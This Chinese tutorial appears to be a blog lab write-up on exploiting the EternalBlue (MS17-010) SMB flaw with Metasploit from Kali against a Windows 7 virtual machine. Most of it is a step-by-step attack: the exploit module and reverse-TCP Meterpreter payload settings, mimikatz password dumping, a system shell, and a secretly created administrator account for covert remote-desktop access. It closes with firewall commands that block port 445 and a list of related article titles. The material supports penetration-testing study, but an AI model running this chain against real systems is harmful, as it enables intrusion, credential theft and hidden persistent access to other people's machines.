恶意代码会扫描开放共享端口的windows机器,无需用户任何
永恒之蓝是会扫描开放445端口文件共享端口的windows机器,无需用户任何操作,只要开机上网。
会感染windowsxp windows2000 windows2003 windowsvista mac os 系统等
1.实验环境:kali-linux windows7旗舰版
2.IP地址
kali:192.168.116.129
win7: 192.168.116.130

3.开始实验

进入msfconsole,利用windows/smb/ms17_010_eternalblue(永恒之蓝漏洞)
进行攻击靶机win7

4.使用永恒之蓝漏洞
use exploit/windows/smb/ms17_010_eternalbule

5.设定靶机ip和操作机ip(主要是靶机ip,因为端口在这个漏洞模块里默认是445,不用再设置,本地监听端口4444也是如此)
设定靶机ip(win7):set rhost 192.168.116.130
设定操作机ip(kali):set lhost 192.168.116.129

6:设置TCP连接
set payload windows/x64/meterpreter/reverse_tcp

7.查看配置
show options

查看是否设置成功
8.攻击
run 或者exploit



攻击成功 进入到meterpreter模块
9.获取win7用户密码
利用load mimikatz 调用获取系统用户密码
因为我这个已经加载过一次了,所以会报错


如果是第一次加载就会出现

然后利用kerberos模块 来获取win7靶机的系统用户密码


9.提权
shell


得到靶机权限
10.或者新建一个用户,偷偷的控制权限使用
net user liang 123456 /add (创建一个用户密码为admin 123456)
11.提权,将新建用户liang提权到管理员权限
net localgroup administrators liang /add

查看权限
net user liang

12,远程连接靶机桌面


直接用自己所创建的用户远程连接进入系统。
渗透测试成功
主要攻击 win7,server2008 之类的机器
防御办法:
1,网上下载补丁,
2,关闭445端口,dos命令:
netsh advfirewall firewall add rule name=”deny445” dir=in protocol=tcp localport=445 action=block
netsh firewall set portopening protocol=tcp port=445 mode=disable name=deny445
检测445端口是否开启:
netstat -ano -p tcp | find “445”

永恒之蓝 ms17_010_eternalblue相关推荐

  1. kali使用msf 通过ms17_010_eternalblue(永恒之蓝)漏洞攻击win7测试 及乱码问题解决

    两台Vmware虚拟机: Kali Win7 64位: (主机)kali的ip是 192.168.0.119 (靶机)win7的ip是192.168.0.109 使用nmap端口扫描工具,扫描一下目标 ...

  2. MS17-010(永恒之蓝)漏洞分析与复现

    文章目录 一.漏洞简介 1.永恒之蓝介绍: 2.漏洞原理: 3.影响版本: 二.漏洞复现 复现环境: 复现过程: 1.主机发现: 2.使用MSF的永恒之蓝漏洞模块 3.使用ms17-010扫描模块,对 ...

  3. kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7

    kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7 前言: 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生. ...

  4. 利用永恒之蓝入侵服务器复制文件,msf利用永恒之蓝进行漏洞攻击

    1. 永恒之蓝Eternalblue 攻击 Eternalblue 通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞 恶意代码会扫描开放445文件共享端口的Windows机器, ...

  5. linux 会不会受到永恒之蓝漏洞,永恒之蓝漏洞复现(ms17-010)

    永恒之蓝漏洞复现(ms17-010) 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机 ...

  6. 永恒之蓝ms17_010漏洞利用攻击

    文章目录 前言 一:基础知识介绍 二.实验环境 三.实验步骤 总结 前言 学习Metasploit的时候就听说了经典的永恒之蓝漏洞,所以自己试验了一次,借此作个记录. 一:基础知识介绍 1.何为永恒之 ...

  7. 永恒之蓝实验 MS17-010

    永恒之蓝MS17-010是2016年8月公开的漏洞,基于445端口迅速传播扩散,危害超出想象的严重. 实验准备: 虚拟机下kali攻击机:192.168.111.128 w7靶机:192.168.11 ...

  8. 经典利用永恒之蓝漏洞对Windows操作系统进行攻击

    利用永恒之蓝对Windows进行攻击 环境搭建:kali.Windows server 2008R2.Windows 7,其中Windows server 2008R2\WIN7为靶机. 首先简单介绍 ...

  9. 永恒之蓝(Eternal Blue)复现

    永恒之蓝介绍 什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机.甚至于201 ...

最新文章

  1. 卖了5个月水果之后再看互联网思维
  2. 鸟哥的Linux私房菜(基础篇)-第一章、Linux是什么(一.3. Linux的特色)
  3. 教程:如何迅速制造Vista蓝屏死机?
  4. 使用springmvc时处理404的方法
  5. linux下部署node+vue文件
  6. Linux CentOS 6.5 操作环境下修改mysql数据库密码
  7. 日留存、周留存、月留存,究竟怎样才能让更多的用户留下来?
  8. win2003系统自动登录两法
  9. 调节效应检验(一):线性回归分析
  10. SVN教程代码比较(图文教程)
  11. html图片怎么弄透明背景,如何使用CSS实现背景图像透明
  12. 支持lodop的服务器,clodop云打印服务器未响应(lodop打印)
  13. Flink 灵魂两百问,这谁顶得住?
  14. SpringBoot+Hibernate配置
  15. 2023美团面试真题
  16. HLS/m3u8之sample-aes解密及软件开发
  17. Mysql黑马学习笔记
  18. STANet: 基于时空自注意力的遥感图像变化检测模型,提出一个新的大型变化检测数据集LEVIR-CD
  19. SpringBoot将数据生成Excel表
  20. Omnipeek使用抓包网卡驱动安装问题

热门文章

  1. pro c 访问 MySQL_使用PRO*C编程的一些说明和例子
  2. CF667DIV3-F:dp
  3. 像巴菲特那样管理资本
  4. WarGame系列之Natas(Web安全)通关指北(初级篇0-10)详细版
  5. 资本加速涌入,万亿虚拟数字人市场已至爆发前夕
  6. ClickHouse Replicated*MergeTree复制表原理、Distributed分布式表原理
  7. 锤子科技正式开源两项核心交互功能
  8. android 字体花屏,Android bug——Launcher 0x506导致花屏问题
  9. 天天用MySQL开发,你知道数据库能抗多大并发压力吗?
  10. Exchange邮箱服务器的可用性(转)